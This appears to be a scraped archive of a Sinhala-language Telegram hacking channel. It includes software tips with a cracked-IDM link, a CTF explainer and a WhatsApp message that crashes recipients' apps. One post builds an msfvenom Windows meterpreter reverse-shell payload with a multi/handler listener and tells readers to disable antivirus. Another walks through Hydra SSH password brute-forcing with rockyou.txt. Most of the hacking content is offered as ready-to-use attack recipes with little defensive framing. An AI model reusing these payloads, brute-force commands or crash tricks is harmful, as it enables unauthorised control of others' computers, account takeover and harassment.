Anony 2.0
前往频道在 Telegram
LIMITED EDITION . . ▫️ Only Hacking Anony 2.0 : @Anony_2_0 Main Channel : @Team_Mars_11 Courses : @Team_Mars_11_Bcp Connet All Admins : @Mars11Lk_Bot Powered By MARS-11ᵀᴹ 🇱🇰
显示更多624
订阅者
无数据24 小时
无数据7 天
无数据30 天
帖子存档
624
Repost from MARS-11ᵀᴹ 🇱🇰
We Need Few Admins For Mars 11 And Annoy 2.0 Channels 😌😎👀
Closing Date :- 2024/03/30
Fill Your Form Here 😎
@JaniduXxX 🫠😊624
624
අද කියන්න යන්නෙ SMART PC එකක තියෙන්න ඔනී වැදගත් Software ටිකක් ගැන 😀👇01.BRAVE BROWSER Chrome,Firefox,Opera මේවට වඩා හොද Chromiume Based Browser එකක් තමා Brave කියන්නේ.. මොනාද මේකෙ තියෙන්නේ ✊ 1)
Invasive ads blocked
2) Cross-site trackers blocked
3) Third-party cookie tracking blocked
4) Fingerprinting blocked (cookie-less trackers)
5) Malware & phishing protection*
6) Protections against bounce tracking
7) Anonymized network routing (Tor mode)
8) Assert opt-out privacy rights (GPC)
කුපිරියක් තාමා අත්දැකීමේන් කියන්නේ ඉතිම් 😁
02.Internet Download Manager ( I D M )
PC එකක අනිවා තියෙන්න ඔනී Software එකක් තමා මේක ` ගොඩක් ප්‍රයොජනවත් බඩුවක් තමා මේක යූස් කරලම බලන්න නැති අය 🥶
මොනාද මේකෙ තියෙන්නේ ✊
1) Download Resume
2) IDM includes web site spider and grabber
3) Download Speed Acceleration
03. CC CLEANER
PC එක පොඩ්ඩක් හොදට ලස්සනට තියා ගන්න මේක වැදගත් වෙයි ඔයාලට 🏠
මොනාද මේකෙ තියෙන්නේ ✊
1) Driver Updater
2) Privacy Protection
3) PC Health Check
4) Performance Optimizer
5) Faster Computer
DOWNLOAD Links 😂?01.Brave - Download 02.IDM - 🔤 Download Official 🔤 Download Pro Crack Mod ( No Malware ) 03.CC Cleaner - Download Credit :- @𝓜𝓻. 𝓙𝓪𝓷𝓲𝓭𝓾 2023 © 🥳😎 😇 Copyright © 2023 Anony 2.0 ✅ 😁 Copyright © 2023 MARS-11ᵀᴹ 🇱🇰 ✅
624
CTF කියන්නෙ මොකක්ද ? 👀
CTF = Capture The Flag
ගොඩක් කාලෙකින් පොස්ට් එකක් ගෙනාවෙ මම , මොකද දැම් මම තාත්ත කෙම්නෙක් එක නිසාම් වැඩ වැඩී ...🙈😌
ගොඩක් අය අහල ඇති >නැති අයත් ඇති , දෙගොල්ලටම කෙටියෙන් මේක හදුන්වලා දෙන්නම්...😎🤓
% (CTF) යනු ආරක්ෂක කුසලතා පරීක්ෂණයක් ලෙස භාවිතා කරන සයිබර් ආරක්ෂණ තරඟයකි. එය මුලින්ම 1993 දී DEFCON හි සංවර්ධනය කරන ලදී.මෙකෙ වෙන්නෙ Vurnerable System Ekaka Flag එකක් හන්ගනවා. එක හොයගන්න තමා තියෙන්නෙ එක නිසා තමා කියල මේකට Capture the flag කියන්නෙ... Flag එකක් කිව්වෙ මේ වගේ එකක් 👇
Ex - MARS { !am J@niDu XxX }
Mah8inda2015
Flag එක එක විදිහට තියෙනවා හැබයි🤔
මේක ගොඩක් වෙලාවට භාවිත වෙන්නෙ ඉගෙන ගන්න හා ක්‍රීඩාවක් විදිහට 🤑
CTF කොහෙද සෙල්ලම් කරන්න තියෙන්නෙ 😵💫
1. TRYHACKME ( Beginners ) 👻
2. HackTheBox ( Pro ) 😈
තව තියෙනවා ඔය දෙකෙන් ලොකු වැඩක් ගන්න පුලුවන් 🤘😼
Post By ᴊᴀɴɪᴅᴜ𝕏𝕩𝕏 ✅
.
.
#mars_11 #hacking #ctf #janiduxxx
😇 Copyright © 2023 Anony 2.0 ✅
😁 Powered By MARS-11ᵀᴹ 🇱🇰 ✅624
🚫 දැන් මේ bug එකෙන් හුගක් උන් ආතල් ගන්නවනේ 😂
ඔයාට මේ bug msg එක කවුරුහරි එව්වොත් ඒක delete කරන්න ඉස්සර්ලම. ඉතින් ඒක normal whatsapp app එකෙන් කරන්න බෑ. ඒ හින්ද whatsapp web වලින් ගිහින් message එක delete කරන්න. නැත්තම් කෙලින්ම message එක තියෙන chat එක delete කරන්න වෙනවා. Chat එකේ ඕන වෙන දේවල් තිබිල ඒවත් delete වෙන්න පුළුවන් නිසා whatsapp web වලින් ගිහින් delete කරන එක මම recommended කරන්නේ.
#mars_11 #anony #wtf #cari_samaje #whatsapp #whatsapp_vulnerbility #bug
624
💬Whatsapp Mod වලට පවා වදින අලුත්ම Whatsapp Bug එක 🥵🥶
අලුත් කිව්වට දැනට ටිකදවසකට විතර කලින් මේ bug එක හොයාගත්තෙ. 🤡
✅ කොහොමද Bug එක Use කරන්නේ ?
ඉතින් මේ bug එක private chats, Groups වල use කරන්න පුළුවන්. ‼️
wa.me/settings කියලා type කරලා අදාල chat එකට යවන්න. එතකොට මේ bug එක නිසා ඒ chat එක user open කරද්දී whatsapp app එක crash වෙනවා. 😴
මේක ඉක්මනටම whatsapp එකෙන් Fix කරයි. අපි මේක කියල දුන්නට මේක වැරදි වැඩ වලට එහෙම පාවිච්චි කරන්න එපා. 😭
මම Mᴀsᴛᴇʀ𝕏 ✅
.
.
⚠️ Disclaimer : We Do Not Promote any Illegal or Violent Content. All Rights Reserved ✅
#mars_11 #anony #whatsapp #whatsapp_vulnerbility #bug
😁 Powered By MARS-11ᵀᴹ 🇱🇰 ✅624
අද වැඩිය විස්තර කරන්න යන්නෙ නෑ type කර කර ඉන්න කම්මැලී 😀😀... ඒ හින්ද කෙලින්ම වැඩේට බහිමු.
01. Payload එකක් හදාගමු.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=(⚠️your public or local ip⚠️) LPORT=4444 -o /sdcard/mars11_msf_32.exe
Payload එක හැදෙන්න ටික වෙලාවක් යනවා ඒ හින්ද පොඩ්ඩක් ඉවසලා ඉන්න. හරි දැන් payload එක Storage එකේ mars11_msf_32.exe කියල හැදිලා ඇති…
Antivirus Software Use කරනෝනම් ඒක පොඩ්ඩක් නටන්න ගනියි එතකොට malicious එකක් කියල ගනන් ගන්න එපා hehe 😅. සමහර Antivirus Software වලින් හැදුන payload එක delete කරන්න පුළුවන්. ඒ හින්ද antivirus use කරනෝනම් off කරල වැඩේට බහින්න.
02. Windows PC එක Control කරමු.
ඉස්සර්ලම metasploit framework එක start කරගෙන ඉන්න. ඊට පස්සෙ පහල cmds ටික use කරන්න.
msf > use multi/handler
msf > set LHOST (⚠️your public or local ip⚠️)
msf > set LPORT 4444
msf > exploit
දැන් ඔය අස්සෙ ඔයා PC එකට අර mars11_msf_32.exe නමින් හැදුන Payload එක install කරගන්න. ( meterpreter > විදිහට Prompt එක එනවා ඔයා හරියටම වැඩේ කරානම් )
හරි දැන් මුල් වැඩ ටික Success...
ඊට පස්සේ පොඩි දෙයක් කරන්න ඔනි ඒක ඔයා පොඩ්ඩක් හොයලා බලලා කරගන්න. ( ඔක්කොම කිව්වොත් කිසි වටිනාකමක් නෑනි 😀😀 )
Metasploit - PART 03 Coming Soon...!!
.
.
🍀 Post by Mᴀsᴛᴇʀ𝕏 ❤
.
.
#mars_11 #metasploit #hacking #pc #windows
😁 Copyright © 2023 MARS-11ᵀᴹ 🇱🇰 ✅624
✅ Metasploit Framework - PART 02 ✅
Metasploit Framework එක Use කරල Windows PC එකක් Hack කරමු...
කලින් පෝස්ට් එකේදි අපි කතා කරේ Metasploit වලින් Android Device එකක් Hack කරල සම්පූර්නයෙන්ම Control කරන හැටි ගැන. ඉතින් අද අපි මේ පොස්ට් එකෙන් කතා කරන්නෙ ඒ විදිහටම Metasploit වලින් Windows වලට Payload එකක් හදලා යවල control කරන විදිහ. කලින් post එක තව කියෙව්වෙ නැත්තම් මෙතනින් ගිහින් කියවන්න.
ඔයාල Metasploit දැනටමත් install කරගෙන ඇති කියල හිතනවා.. තාම install කරගත්තෙ නැත්තම් කලින් post එක කියවල install කරගන්න. ඒක තේරෙන්නෙ නැත්තම් Google & YouTube එකේ ඕනි තරම් Videos එහෙම තියෙනවා ඒව බලල install කරගන්න.
624
😎 කාලි අම්මගෙ අලුත් අප්ඩේට් එක !⚡️👩💻
Kali Linux is a well-known name among penetration testers and developers alike that offers a very robust set of tools for most pen testing use cases.
On the eve of its 10th anniversary, two new major releases have been unveiled, including a new Kali Linux variant called 'Kali Purple', and the first update of this year, code-named 'Kali Linux 2023.1'
What is in Kali Purple?
On a higher level, Kali Purple consists of:
👓perfect for:
මම - CrowKing😎
😁 Copyright © 2023 MARS-11ᵀᴹ 🇱🇰 ✅
+Learning
+Practicing SOC analysis and threat hunting
+Security control design
+pentresting
New Tools in Kali🎩
#Arkime
#CyberChef
#DefectDojo
#Dscan
#Kubernetes-Helm
#PACK2
#Redeye
#Unicrypto
DOWNLOAD HERE 😎
—-SHA256—-
sum90bb0e48968aa7956d6b36ab8092168e7d7657d61e0e85e47d6b0febca6e48d4
—-Direct Link—-
https://cdimage.kali.org/kali-2023.1/kali-linux-2023.1a-installer-purple-amd64.iso
Source - මහින්ද මහත්තයා 😽
624
🎧 Part 02 ( Practical ) 📱
How To Hydra Tool <3👀
හායි මයි ඩියර් ෆ්‍රෙන්ස් .. ගුම් මොර්නින්ග්
කලින් දැම්ම ගැන විස්තරයක් බැලුවේ නැත්තම් බලහම් ,😾
අල්ලන්න එපාහ් ( Don't Thouch) 🫡
මිරිකපම් මේක ( Thouch Me) 🤨
මෙහෙමයි Hydra ටූල් එක යූස් කරන්න BruteForceවලට කියල දන්නවනේ...🫵
ඒත් කරන විදිහ දන්නේ නැද්ද ? කියවහම් දිගටම 💪[+]
මම මේකට SSH එකක් ගන්නවා Username දන්න හැබැයි Password නොදන්න එකක් ( SSH Credit To TryHackMe 🤖)
මේකේ පාස්වර්ඩ් එක හොයාගන්න යොදාන්න දේවල් 👇
දැන් මම ඉන්ග්‍රිරීසි වලිම් ලියම්නම්. ( ඉන්ග්‍රිසී බැරි බව කරැණාවෙන් සළකන්න😥🥺. )
# First We Talk to Hydra - Using This Cmd ( ඇහැරපම් Hydra ) 🤑
$hydra
#Then we say To Hydra,This SSH's Username is "Jan"
1.Hydra
2.Vip Wordlist
සිග්නල් මත Bruteforcing ස්පීඩ් එක රදා පවතී. ( Isp Provider - Dialog අනාගතේ මගේ අතේ )
$hydra -l jan
#after We say to Hydra , We Dont Have It's password but We Have Wordlist
$hydra -l jan -w { wordlist path )
ex:- $hydra -l jan -w /home/mars11/woardlist/rockyou.txt
#Then We say to Hydra , It's Host Is 10.10.10.255
$hydra -l jan -w {wordlist path} {Host Ip Address}
ex:-hydra -l jan -w /home/mars11/woardlist/rockyou.txt ssh://10.10.10.255
#Finally We Say to Hydra use this options -v and -t 4
hydra -l jan -w /home/mars11/woardlist/rockyou.txt ssh://10.10.10.255 -t 4 -vV
We Got The Password 🥳😱
Hydra Cmd ()
Option Description
__________
-l Single Username
-P indicate use the Following Password
-t Specifs The number Of threads To use
-V Verbose output for every Attempt
-w Path of Wordlist
මම - (මහදැනමුත්තාXxX) 🥸
Credits - (මහදැනමුත්තාXxX) 🥸
❤️🩹 Main Channel : https://t.me/+sXRmXtPSbQYzYzg9
🌿 Anony 2.0 : https://t.me/+e6NUstk_LEM4ZDdl
✨ Courses : https://t.me/+FWU0ARTXl7Q2ZTdl
🚧 Connet All Admins : @Mars11Lk_Bot
#mars_11 #mars #hydra #bruteforcing #JaniduXxX
😁 Copyright © 2023 MARS-11ᵀᴹ 🇱🇰 ✅624
Part 01 ( Walkthrough)
#1.What is Hydra?
Hydra කියන්නේ Brute Force කරන්න හොද ටූල් එකක් .
ඇයි මේක් හොද වෙන්නෙ ඇයි වෙන ටූල් නැද්ද > තියෙනවා 😌
මම - JANIDUXxX 😎👽
.
.
❤️🩹 Main Channel : https://t.me/+sXRmXtPSbQYzYzg9
🌿 Anony 2.0 : https://t.me/+e6NUstk_LEM4ZDdl
✨ Courses : https://t.me/+FWU0ARTXl7Q2ZTdl
🚧 Connet All Admins : @Mars11Lk_Bot
#mars_11 #mars #hydra #bruteforcing #JaniduXxX
😁 Copyright © 2023 MARS-11ᵀᴹ x ANONY 2.0 🇱🇰 ✅
*Nmap
*Metasploitable
*BrupSuit
*ETC.
කොහොම වුනත් මේවට වඩා Hydra හොදයි මොකද BruteForcing වල ස්පීඩ් එක වැඩී. 😎🤓
2#.Brute Force මොනාටද කරන්න පුලුවන් ?
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Special - SSH,HTTP-FROM-POST 🤩
3#.Installing Hydra
Kali,Parrot වගේ Os වල Inbuild Install කරල එනවා Hydra Tool Eka .
Git Hub LInk 📶 - Hydra 👇
4#.SUPPORTED PLATFORMS
-------------------
- All UNIX platforms (Linux, *BSD, Solaris, etc.)
- MacOS (basically a BSD clone)
- Windows with Cygwin (both IPv4 and IPv6)
- Mobile systems based on Linux, MacOS or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)
5#.Usage Basic
$ hydra -h
$ ./hydra -h
වීඩියෝ එකක් ගෙන්නම් ඉස්සරහට ප්‍රෑක්ටිකල් <3 🥳
